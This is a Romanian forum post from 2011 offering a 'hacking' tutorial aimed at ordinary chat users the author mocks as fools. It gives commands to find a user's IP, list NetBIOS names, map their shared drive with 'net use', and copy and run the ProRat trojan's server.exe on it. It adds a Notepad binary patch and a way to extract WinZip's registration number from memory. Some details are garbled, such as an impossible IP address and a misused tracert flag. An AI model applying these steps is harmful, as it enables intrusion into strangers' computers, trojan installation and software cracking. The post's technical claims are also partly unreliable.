| pipinote | Data: Vineri, 2011-05-20, 3:28 AM | Mesaj # 1 |
|
V.I.P General Jocuri-Copsa.Do.Am
Grup: Administrators
Mesaje: 109
Status: Offline
| oate programele mentionate le gasiti folosind motorul de cautare in care tastati numele
programului
Vom folosi niste programe de hack pe care le aveti in windows si nici nu stiti de ele.
Puteti lua IP-ul cuiva cu ajutorul comenzii dos c:/windows/tracert -j www.numeserver.
Incercati cu c:/windows/tracert -j www.nebunu.home.ro pentru a afla ip-ul meu.
Comanda c:/windows/nbtstat -n va va lista toate numele de utilizator din calculatorul dvs iar
c:/windows/nbtstat -n www.numeserver va face acelasi lucru cu www.numeserver sau cu IP-ul
persoanei dorite cum ar fi c:/windows/nbtstat -n 193.148.458.934.
Sa trecem acum la niste smecherii pe care le puteti face pe chat-uri unde sunt toti fraierii.
Presupunem ca un calculator are optiunea "file and print sharing" din optiunea "network"
care se gaseste in "control panel" activata.
Pentru a scana gazdele vulnerabile folositi programul Legion sau Nbtscan.
Daca este asa atunci putem face ce vrem cu calculatorul acelui lamer.Voi intrati pe chat cu
programul Mirc.Tastati "dns/nickname" pentru a-i la IP-ul apoi urmati succesiunea de comenzi:
c:/windows/nbtstat -n IP {IP este adresa de ip a lamerului}
Dupa aceasta comanda aflati probabil si numele computerului acelui nefericit.Presupunem ca numele
este crystygye(nu,nu incercati la mine,eu nu intru pe chat-uri -:).
Tastati "c:/windows/net use f:\\IP\crystygye" si aveti acces la discul f al fraierului!.
Sa explicam aceasta comanda:
Programul net.exe se gaseste in directorul windows al utilizatorilor de windows 95.
IP-adresa lui de ip.
f-poate sa fie si c: sau d: ,reprezinta discul la care dorim sa avem acces.
nebunu-numele computerului pe care-l aflati cu "c:/winldows/nbtstat -n IP"
Sa instalam acum un troian cum ar fi ProRat pe calculatorul lamerului.
Dupa ce dati comanda "c:/windows/net use f:\\IP\crystygye" copiati fisieul "server.exe" pe f:
"copy server.exe f:" apoi il executati "f:/server.exe".
DISTRACTIE PLACUTA
Daca nu are "file and print sharing" disabled si este utilizator de windows NT atunci puteti crea
un disc virtual x: pe care sa puneti troianul.
"net use x:\\IP\tmp\parola_dorita/user:ntwak0
"net copy server.exe"
C-R-A-C-K-I-N-G ----------------------- N-O-T-E-P-A-D
Nu va deranjeaza atunci cand deschideti un fisier mai mare de 100k in notepad,si apare
mesajul "the file is too large for notepad to open......."????.Haideti sa scapam de acest mesaj
si sa intram direct in Wordpad cand ne confruntam cu o astfel de siuatie.
1) avem nevoie de programul de dezasamblare w32dasm,de programul Hiew
2) cunostinte minime de assembler
-dezasamblati programul in w32dasm
-activati optiunea "string reference" si cautati sirul "the file is too large..."
-veti gasi ceva de genul "string resource ID=00052" -selectati optiunea Function submeniul Import
-cautati functia User32.messageboxA(responsabile de casetele de dialog in windows)
-dati dublu click pe ea si obtineti ceva de genul
call dword ptr [00407430] {chemarea procedurii de mesaj}
cmp eax,0000006{compara registrul eax cu adresa procedurii}
jne 00402E19 {daca eax nu este egal cu 0000006 .atunci iese din program pentruca sunt doua optiuni
la selectarea lui OK se deschide Wordpad iar altfel iese.
Celelalte instructiuni nu mai conteza
- -selectati cu mouse-ul intstructiunile call si jne si notati adresa lor de ofset
-inchideti w32dasm
-deschideti Hiew "hiew notepad.exe"
-selectati F4 optiunea decode
-F5 si scrieti 2161 {adresa primului numar de offset (gasit pentru cmp)}
-F3 scrieti 404840484048
-F9 pentru a valida introducerea
-F5,scrieti numarul pentru jne care este 216A
-F3,scrieti 404840484048
-F9 pentru a actualiza si Gata!!!
Ce dracu' este 404840484048?
40-in hexazecimal inseamna "inc eax" adica adauga 1
48-inseamna "dec eax" adica scade 1
90 inseamna NOP adica instructiunea nula(nu face nimic)
Asi fi putut la saltul "jne" sa pun NOP dar unele programe nu accepta aceasta instructiune
asa ca am preferat sa execute un ciclu de genul "inc eax"---" dec eax"(pun 1 si apoi iau 1).
C-R-A-C-K-I-N-G W-I-N-Z-I-P
-deschid winzip si unde mi se cere numarul de inregistrare introduc 66696669
-NU tatez Enter!!! Las winzip asa cum este si il deschid in w32dasm ca proces in executie
-scanez in programul dezasamblat 66696669 in hexa
-ma duc la adresa indicata cum ar fi 00154:FA14569
-gasesc ceva de genul:
mov al,[edx]
cmp al,[esi]
jnz 00418956
Deci compara numarul meu fals din "al" cu numarul de inregistrare adevarat aflat in memorie
in "esi".Treduie sa afisez continutul registrului esi pentru a afla numarul adevarat!!!!
|
| |
| |
